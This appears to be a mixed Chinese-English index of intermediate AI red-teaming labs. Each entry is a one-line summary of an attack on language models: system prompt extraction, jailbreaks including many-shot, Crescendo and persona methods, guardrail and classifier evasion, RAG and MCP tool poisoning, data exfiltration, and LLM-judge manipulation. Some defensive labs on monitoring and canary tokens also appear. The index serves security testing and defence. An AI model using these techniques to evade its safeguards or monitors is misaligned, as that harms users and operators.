# intermediate

動手實驗室,主題為extracting system prompts from tool-using AI agents by exploiting tool interactions,observation channels,multi-step reasoning to leak protected instructions.

labagentsprompt-leakingtool-useintermediate

中級

實驗：代理工作流程安全測試

測試多步代理工作流程的注入點、狀態操弄與未授權的動作執行。

labsagent-workflowtestingintermediate

中級

API Abuse Pattern 實驗室

Discover與exploit API abuse patterns,包括 parameter injection,header manipulation,endpoint confusion.

intermediateabuselabpatternslabsapi

中級

API Parameter Fuzzing for LLMs

Systematically fuzz LLM API parameters to discover unexpected behaviors與bypasses.

labsapifuzzingintermediate

中級

實驗：API 版本控管的安全縫隙

利用 LLM API 各版本間的差異，找出已淘汰的端點與向後相容的安全繞過。

labsapi-versioningsecurity-gapsintermediate

中級

實驗室:自動化紅隊流水線

動手實驗室,主題為building a continuous AI red team testing pipeline using promptfoo,GitHub Actions,automated attack generation to catch safety regressions before deployment.

labautomationci-cdpromptfoopipelineintermediate

中級

實驗室: Automated Red Team 測試

Set up promptfoo for continuous automated 安全測試 of AI applications,with custom evaluators與CI/CD integration.

labautomated-testingpromptfooci-cdintermediatehands-on

中級

實驗：金絲雀 Token 有效性測試

在系統提示中部署並測試金絲雀 token，評估其偵測提示擷取的有效性。

labscanary-tokenstestingintermediate

中級

實驗：思考鏈利用

利用思考鏈推理，洩漏模型內部推理、繞過安全過濾器、操弄決策過程。

labschain-of-thoughtexploitationintermediate

中級

實驗：LLM 應用的 CI/CD 管線安全

測試 LLM 應用的 CI/CD 管線安全，包含提示樣板注入、模型成品竄改與部署攻擊。

labscicdpipeline-testingintermediate

中級

實驗：進階分類器閃避

使用對抗性擾動、語意改寫與無梯度最佳化，閃避進階輸入分類器。

labsclassifierevasion-advancedintermediate

中級

ML Classifier Evasion 實驗室

發展payloads that evade machine learning-based input classifiers through adversarial text perturbation.

classifierintermediateevasionlablabs

中級

實驗：雲端 AI 平台安全測試

測試雲端 AI 平台組態，包含 AWS Bedrock guardrails、Azure 內容過濾器與 GCP 安全設定。

labscloud-platformtestingintermediate

中級

實驗：程式碼生成安全測試

測試 LLM 程式碼生成中的不安全模式、注入漏洞與程式碼執行安全問題。

labscode-generationsecurity-testingintermediate

中級

實驗：AI 合規測試基礎

以結構化測試程序，依 OWASP LLM Top 10 與 NIST AI RMF 的要求測試 LLM 應用。

labscompliancetestingintermediate

中級

實驗：上下文窗口攻擊最佳化

透過注意力動態，最佳化提示注入在上下文窗口中的擺放位置以最大化攻擊效果。

labscontext-windowoptimizationintermediate

中級

上下文 Window 投毒實驗室

利用 context window management to inject persistent adversarial content that influences future model responses.

contextintermediatelabpoisoningwindowlabs

中級

Conversation Splitting 攻擊實驗室

Split adversarial payloads across multiple conversation turns to bypass per-message safety classification.

intermediatesplittingconversationlablabs

中級

Conversation State 投毒

利用 conversation history manipulation to alter model behavior across turns.

labsconversationstate-poisoningintermediate

中級

Cross-上下文注入

注入prompts that persist across separate conversation contexts in shared deployments.

labscross-contextinjectionintermediate

中級

Custom 越獄 Wordlist 生成

Generate targeted jailbreak wordlists using mutation strategies與seed prompts.

labswordlistsjailbreakingintermediate

中級

實驗室: Data Exfiltration Channels

動手實驗室,主題為extracting data from AI systems through markdown image rendering,invisible links,tool call parameters,other covert exfiltration channels.

labdata-exfiltrationcovert-channelsmarkdownintermediate

中級

實驗室: Data Exfiltration Channels (中階實驗室)

萃取sensitive information from AI systems through various exfiltration channels,包括 crafted links,image tags,tool calls,side-channel leakage.

labdata-exfiltrationchannelsside-channelintermediatehands-on

中級

Data Exfiltration via Side Channels

萃取data from LLM systems using timing,token probability,formatting side channels.

labsexfiltrationside-channelsintermediate

中級

Building 防禦繞過 Chains

Combine multiple bypass techniques into reliable chains that defeat layered defenses.

labsdefense-bypasschainsintermediate

中級

實驗室: 防禦 Effectiveness Measurement

動手實驗室,主題為quantifying AI guardrail robustness using attack success rates,evasion metrics,false positive rates,statistical analysis of defense performance.

labdefensemetricsmeasurementguardrailsintermediate

中級

實驗：防禦回歸測試建置

建構一個回歸測試框架，持續驗證 LLM 防禦對已知攻擊模式仍然有效。

labsdefenseregression-testingintermediate

中級

實驗室: 防禦 Effectiveness 測試

Systematically test與measure the robustness of AI guardrails using structured methodology,metrics,repeatable test suites.

labdefense-testingguardrailsmetricsintermediatehands-on

中級

Document-Based RAG 注入實驗室

注入adversarial content into documents that will be processed by a RAG system to influence model responses.

intermediateinjectionlablabsragdocument

中級

實驗：進階嵌入操弄

操弄嵌入向量以達到目標相似度分數，用於 RAG 投毒與取回操弄。

labsembeddingmanipulation-advancedintermediate

中級

Practical 嵌入操控

Manipulate text to achieve target embedding similarities for poisoning retrieval augmented generation systems.

intermediatelabpracticalmanipulationembeddinglabs

中級

嵌入 Similarity Attacks

Manipulate text to achieve target embedding similarity scores for retrieval poisoning.

labsembeddingssimilarityintermediate

中級

實驗室: Encoding 繞過實驗室

動手實驗室,主題為systematically testing Base64,ROT13,Unicode homoglyph,hexadecimal,combined encoding bypasses 對抗 LLM safety filters with measured success rates.

labencodingbypassobfuscationsystematic-testingintermediate

中級

微調 API 安全 Probing

Probe fine-tuning APIs for security weaknesses,包括 insufficient validation與unsafe default configurations.

fineintermediatetuninglablabsapi

中級

實驗：微調對安全的影響測試

透過比較微調前後的安全基準分數，衡量微調對模型安全性的影響。

labsfine-tuningsafety-testingintermediate

中級

實驗：防護欄繞過技術實驗室

針對 NeMo Guardrails、LLM Guard 與自製分類器防禦，練習防護欄繞過技術。

labsguardrail-bypasstechniquesintermediate

中級

護欄 Fingerprinting

Systematically map the rules與thresholds of input/output guardrail systems.

labsguardrailsfingerprintingintermediate

中級

護欄 Rule 萃取實驗室

Systematically extract the rules與decision boundaries of guardrail systems through targeted probing.

guardrailruleintermediatelablabsextraction

中級

實驗：利用 LLM 幻覺

利用幻覺傾向，觸發捏造的工具呼叫、虛構的 API 端點與虛假事實注入。

labshallucinationexploitationintermediate

中級

實驗：AI 事件回應模擬

透過模擬的提示注入事件，搭配升級與圍堵流程，演練 AI 事件回應程序。

labsincident-responsesimulationintermediate

中級

實驗室: Indirect 提示詞注入

注入instructions through external data sources,包括 documents,web pages,emails that a target AI system processes as context.

labindirect-injectionexternal-datadocumentsintermediatehands-on

中級

Indirect 注入 via Web Content

Plant 提示詞注入 payloads in web pages consumed by RAG-enabled LLM applications.

labsindirect-injectionwebintermediate

中級

實驗：指令遵循度量

量化衡量指令遵循的順從度，辨識模型在相互競爭的指令中如何排序。

labsinstruction-followingmeasurementintermediate

中級

LLM Judge 操控

Craft responses that exploit LLM-as-judge evaluation patterns to achieve high safety scores while embedding harmful content.

labsllm-judgemanipulationintermediate

中級

實驗：以對數機率進行攻擊分析

利用 token 對數機率，擷取訓練資料、系統提示與模型內部相關的資訊。

labslogprobsanalysisintermediate

中級

實驗：進階 MCP 協定測試

對 MCP 伺服器進行進階安全測試，包含傳輸分析、能力列舉與工具投毒。

labsmcpadvanced-testingintermediate

中級

MCP 工具投毒攻擊

利用 MCP tool descriptions to inject instructions that redirect agent behavior.

labsmcptool-poisoningintermediate

中級

實驗：Model Context Protocol 模糊測試

對 MCP 協定訊息進行模糊測試，找出 MCP 伺服器中的解析錯誤、驗證缺口與非預期行為。

labsmcp-fuzzingprotocolintermediate

中級

Practical 模型 Fingerprinting 實驗室

Fingerprint the underlying model behind an API endpoint to identify its type,version,configuration.

fingerprintingintermediatelabpracticallabsmodel

中級

實驗：LLM 安全監控建置

為 LLM 應用部署具備異常偵測與告警的完整安全監控系統。

labsmonitoringsecurity-setupintermediate

中級

實驗：多代理通訊測試

測試多代理系統中代理間通訊的安全性，包含訊息注入與信任邊界違反。

labsmulti-agentcommunication-testingintermediate

中級

Multi-Language 安全繞過實驗室

利用 gaps in safety training coverage across languages to bypass safety mechanisms using code-switching.

intermediatebypasslablanguagelabsmulti

中級

Multi-Language 注入 Attacks

利用 language switching與low-resource language gaps to bypass safety training.

labsmultilingualinjectionintermediate

中級

Multi-模型攻擊 Chaining

鏈 attacks across multiple LLM models in a pipeline to bypass per-model defenses.

labsmulti-modelchainingintermediate

中級

實驗：多模型比較安全測試

對多家 LLM 供應商執行相同的攻擊套件，比較其安全態勢並分析差異化回應。

labsmulti-modelcomparison-testingintermediate

中級

Multi-模型流水線攻擊實驗室

攻擊 a pipeline where multiple models process data sequentially,exploiting trust between pipeline stages.

pipelineintermediatelablabsmultimodel

中級

實驗：多輪狀態追蹤攻擊

利用會話狀態追蹤，在多輪對話中累積出持久的攻擊脈絡。

labsmulti-turnstate-trackingintermediate

中級

實驗室: Multimodal 注入

動手實驗室,主題為embedding text instructions in images to exploit vision-enabled LLMs。Learn to craft visual prompt injections,test OCR-based attacks,evaluate multimodal safety boundaries.

labmultimodalvisionimage-injectionintermediate

中級

實驗室: Multimodal 注入 (中階實驗室)

Embed 提示詞注入 instructions in images for vision-enabled models,testing how visual content can carry adversarial payloads.

labmultimodalimage-injectionvisionintermediatehands-on

中級

實驗：中階多模態安全測試

以精心設計、含嵌入式文字、對抗性擾動與視覺注入酬載的影像，測試多模態 LLM。

labsmultimodalintermediate-testingintermediate

中級

Output Channel Discovery 實驗室

發掘alternative output channels in LLM applications that bypass standard output filtering.

discoverychannelintermediateoutputlablabs

中級

實驗：輸出 Schema 利用

利用結構化輸出 Schema，迫使模型透過必填欄位的填寫揭露資訊。

labsoutput-schemaexploitationintermediate

中級

實驗：提示快取側通道攻擊

利用提示快取機制，偵測已快取的提示，並透過時序側通道擷取資訊。

labsprompt-cachingside-channelintermediate

中級

提示詞 Leakage Technique 實驗室

Practice multiple 系統提示詞 extraction techniques與measure their effectiveness across different targets.

intermediatetechniqueslabpromptlabsleakage

中級

Automated Red Teaming with PyRIT

Use Microsoft's PyRIT framework to run automated multi-turn attack campaigns.

labspyritautomatedintermediate

中級

實驗：進階 RAG 安全測試

測試 RAG 系統在分塊利用、重新排序操弄與跨文件注入攻擊上的弱點。

labsragadvanced-testingintermediate

中級

RAG 上下文投毒

Poison a 向量資料庫 to inject adversarial content into RAG retrieval results.

labsragpoisoningintermediate

中級

Reasoning 鏈 Hijacking

Hijack the model's chain-of-thought reasoning,以重新導向 its conclusions toward attacker-controlled objectives.

intermediatechainlabhijackingreasoninglabs

中級

實驗：角色階層利用

透過操弄 system、user 與 assistant 角色之間的指令階層，利用多角色 LLM 架構。

labsrole-hierarchyexploitationintermediate

中級

實驗：安全過濾器基準測試

使用標準化測試套件對各家供應商的安全過濾器進行基準測試，比較偵測率與誤判率。

labssafety-filterbenchmarkingintermediate

中級

Semantic Deception Crafting 實驗室

Craft semantically coherent prompts that conceal adversarial intent from both human reviewers與ML classifiers.

craftingintermediatesemanticlabdeceptionlabs

中級

Semantic 注入 Crafting

Craft semantically coherent injections that evade both classifiers與human review.

labssemanticinjectionintermediate

中級

實驗：語意搜尋操弄

透過設計文件以對特定查詢達到目標相似度分數，操弄語意搜尋結果。

labssemantic-searchmanipulationintermediate

中級

實驗：會話隔離測試

測試多租戶 LLM 部署中的會話隔離，偵測跨會話的資料外洩與脈絡污染。

labssession-isolationtestingintermediate

中級

Session State 利用實驗室

利用 session management vulnerabilities in LLM applications to access other users data or escalate privileges.

exploitationintermediatesessionlablabsstate

中級

實驗：串流回應操弄

利用串流回應機制，繞過僅檢查完整回應的輸出過濾器。

labsstreamingresponse-manipulationintermediate

中級

Structured Output 安全繞過

Use JSON mode與structured output constraints to extract information that would be refused in free-form responses.

intermediatebypassoutputlabstructuredlabs

中級

Structured Output 利用

利用 JSON mode與structured output constraints to bypass safety filters.

labsstructured-outputexploitationintermediate

中級

實驗室: 供應鏈 Audit

Audit an ML project's dependencies for vulnerabilities,covering model files,Python packages,container images,training data provenance.

labsupply-chainauditdependenciessecurityintermediatehands-on

中級

實驗室: ML 供應鏈 Scan

動手實驗室,主題為auditing machine learning model dependencies,detecting malicious packages in ML pipelines,scanning model files for backdoors與supply chain threats.

labsupply-chainsecurityscanningdependenciesintermediate

中級

實驗：系統提示重建（中階實驗）

透過迭代式的部分擷取與多個外洩向量的交叉比對，重建完整的系統提示。

labssystem-promptreconstructionintermediate

中級

進階 Token Smuggling

Use Unicode homoglyphs,zero-width characters,tokenizer quirks to smuggle payloads.

labstoken-smugglingadvancedintermediate

中級

實驗：工具結果注入攻擊

透過工具呼叫結果注入對抗性內容，毒化模型推理並重新導向後續動作。

labstool-resultinjectionintermediate

中級

實驗：Unicode 正規化繞過攻擊

利用輸入驗證與模型處理之間 Unicode 正規化的差異，夾帶注入酬載。

labsunicodenormalization-bypassintermediate

中級

實驗：向量資料庫存取控制測試

測試向量資料庫的存取控制，找出包含命名空間穿越與過濾條件操弄在內的繞過漏洞。

labsvector-dbaccess-controlintermediate

中級

代理 Goal Hijacking

Redirect an AI agent's objectives through carefully crafted inputs that override its primary task.

labsagentgoal-hijackingintermediate

中級

Assistant Prefill 注入 Attacks

利用 assistant message prefilling to prime model responses與bypass safety alignment.

labsassistant-prefillinjectionintermediate

中級

Chat History 操控 Attacks

注入false messages into conversation history to alter model behavior in subsequent turns.

labschat-historymanipulationintermediate

中級

Input Classifier Boundary Mapping

Systematically probe input classifiers to map their decision boundaries與find bypass regions.

labsclassifierboundary-mappingintermediate

中級

上下文 Window Boundary 利用

利用 the boundaries of context windows to push safety instructions beyond the model's attention.

labscontext-windowboundaryintermediate

中級

Crescendo 攻擊實作

實作Microsoft's Crescendo multi-turn escalation attack with automated conversation management.

labscrescendoimplementationintermediate

中級

Cross-Plugin 利用 Chaining

鏈 exploits across multiple plugins/tools in an agent system to achieve multi-step attacks.

labscross-pluginchainingintermediate

中級

Function Schema 操控

利用 function calling schemas to inject instructions through parameter descriptions與enums.

labsfunction-schemamanipulationintermediate

中級

Building Custom Garak Probes

發展custom probe modules for NVIDIA Garak,以測試 organization-specific vulnerability patterns.

labsgarakcustom-probesintermediate

中級

護欄 Latency-Based 偵測

Use timing side channels to identify與characterize guardrail implementations in LLM applications.

labsguardrailslatencydetectionintermediate

中級

Custom Inspect AI 安全 Evaluations

Build custom safety evaluation tasks in Inspect AI,以測試 application-specific vulnerability classes.

labsinspect-aicustom-evaluationsintermediate

中級

JailbreakBench Comparative 測試

Run standardized jailbreak benchmarks across multiple models與compare vulnerability profiles.

labsjailbreakbenchcomparativeintermediate

中級

JSON Mode 安全繞過

利用 structured JSON output modes to bypass safety filters that only check plain-text responses.

labsjson-modesafety-bypassintermediate

中級

LLM Guard Evasion Techniques

發展evasion techniques 對抗 LLM Guard input scanners與output detectors.

labsllm-guardevasionintermediate

中級

Implementing Many-Shot Jailbreaking

實作Anthropic's many-shot jailbreaking technique with scaling analysis across conversation lengths.

labsmany-shotjailbreakingintermediate

中級

MCP Resource Data Exfiltration (中階實驗室)

利用 MCP resource URIs to access與exfiltrate data beyond intended scope boundaries.

labsmcpresourceexfiltrationintermediate

中級

Multi-Language 安全 Gap 利用

Systematically identify與exploit safety training gaps across low-resource languages.

labsmultilingualsafety-gapsintermediate

中級

Multi-Turn State Tracking 利用

利用 state management in multi-turn conversations to gradually shift model behavior over many turns.

labsmulti-turnstate-trackingintermediate

中級

NeMo 護欄繞過 Techniques

Test與bypass NVIDIA NeMo 護欄 configurations using known evasion techniques.

labsnemo-guardrailsbypassintermediate

中級

Output Filter 繞過 via Encoding

繞過output safety filters by instructing the model to encode responses in Base64,hex,or custom schemes.

labsoutput-filterbypassencodingintermediate

中級

PDF Document 注入 for RAG Systems

Craft adversarial PDF documents that inject instructions when processed by RAG document loaders.

labspdfinjectionragintermediate

中級

提示詞 Template Variable 注入

注入adversarial content through template variable expansion in prompt management systems.

labsprompt-templatevariable-injectionintermediate

中級

PyRIT Custom 攻擊 Strategies

Build custom attack strategies與converters in Microsoft's PyRIT framework for targeted campaigns.

labspyritcustom-strategiesintermediate

中級

RAG Document 注入 Campaign

Design與execute a document injection campaign 對抗 a RAG-powered application with vector search.

labsragdocument-injectionintermediate

中級

Semantic Search 投毒

Craft adversarial documents that rank highly in semantic search for targeted queries in RAG systems.

labssemantic-searchpoisoningembeddingsintermediate

中級

Streaming Response Exfiltration

利用 streaming API responses to exfiltrate data that might be caught by batch output filters.

labsstreamingresponseexfiltrationintermediate

中級

系統提示詞萃取 via Token Probabilities

利用 token probability APIs to reconstruct hidden system prompts character by character.

labslogprobssystem-promptintermediate

中級

Token Boundary 操控

利用 tokenizer-specific behavior by crafting inputs that split across token boundaries in unexpected ways.

labstokenizerboundary-manipulationintermediate

中級

工具 Result 注入 Attacks

Craft malicious tool return values that inject instructions back into the model's reasoning chain.

labstool-resultinjectionintermediate

中級

Injecting Text via Images to VLMs

Embed adversarial text in images that vision-language models read與follow as instructions.

labsvisiontext-injectionimagesintermediate

中級

實驗：透過 Webhook 進行資料外洩

測試透過 LLM 觸發的 webhook、API 回呼與外部 URL 渲染進行資料外洩的路徑。

labswebhookexfiltrationintermediate

中級

模擬:新創 AI 評估

以有限範圍與預算對新創之 AI 驅動產品進行紅隊演練,在徹底程度與時間約束之間作務實權衡。

simulationstartupassessmentbudget-constrainedintermediate

中級

透過 Markdown 進行代碼注入

透過 LLM 輸出中的 Markdown 渲染注入可執行載荷，利用網頁型 LLM 介面中文字生成與內容渲染之間的差距。

prompt-injectionmarkdowncode-injectionxssred-teamingintermediate

中級

上下文視窗填充攻擊

填充 LLM 上下文視窗以將系統指令推出活躍記憶體的技術，透過操控符元預算來稀釋或取代防禦性提示詞。

prompt-injectioncontext-windowtoken-manipulationred-teamingintermediate

中級

分隔符逃逸攻擊

利用 LLM 應用程式中用於分隔系統和使用者內容的分隔符的技術，突破沙盒輸入區域以注入指令。

prompt-injectiondelimiter-escapesandbox-escapered-teamingintermediate

中級

Encoding-Based Evasion

Using base64, ROT13, hexadecimal, Unicode, and other encoding schemes to evade input detection systems and bypass content filters in LLM applications.

prompt-injectionencodingbase64rot13unicodeevasionred-teamingintermediate

中級

Few-Shot Injection

Using crafted few-shot examples within user input to steer LLM behavior toward unintended outputs, exploiting in-context learning to override safety training.

prompt-injectionfew-shotin-context-learningred-teamingintermediate

中級

Payload Obfuscation Techniques

Methods for disguising prompt injection payloads through encoding, splitting, substitution, and other obfuscation techniques to bypass input filters and detection systems.

prompt-injectionobfuscationevasionpayload-craftingred-teamingintermediate

中級

Role-Play Injection

Using fictional scenarios, character role-play, and narrative framing to bypass LLM safety filters by having the model operate within a permissive fictional context.

prompt-injectionrole-playjailbreakfictional-framingred-teamingintermediate

中級

Translation Injection

Using translation requests and low-resource languages to bypass content filters, exploiting the uneven distribution of safety training across languages.

prompt-injectiontranslationmultilinguallow-resource-languagesred-teamingintermediate

中級

Virtual Persona Creation

Creating persistent alternate personas within LLM conversations to bypass safety training, establishing character identities that override the model's default behavioral constraints.

prompt-injectionpersonajailbreakDANcharacter-creationred-teamingintermediate

中級

# intermediate

中級認證 Prep Guide

頂石專案:合規評估模擬

頂石專案:紅隊計畫設計

頂石專案:產業垂直深入研究

LLM Guard 與 Protect AI Guardian

NVIDIA NeMo Guardrails

AI 異常偵測

AI 監控與可觀測性

AI 日誌架構

對抗式 ML：核心概念

AI 威脅模型：白箱、黑箱與灰箱

給紅隊員的嵌入向量與向量空間

實作：探索嵌入空間

RAG 架構：檢索系統如何運作

語意相似度與向量搜尋攻擊

推論：取樣、Temperature 與生成

分詞與其安全意涵

預訓練 → 微調 → RLHF 管線

給攻擊者的 Transformer 架構

代理架構與工具使用模式

常見 AI 部署模式與攻擊面

實作：繪製 AI 系統的攻擊面

CTF：程式碼生成攻擊

CTF：RAG 劫案

中階 AI 紅隊實驗室

進階 Encoding 鏈 Attacks

實驗：進階函式呼叫利用

實驗：自動化對抗提示生成

代理 記憶 操控

實驗室: 代理 提示詞 Leaking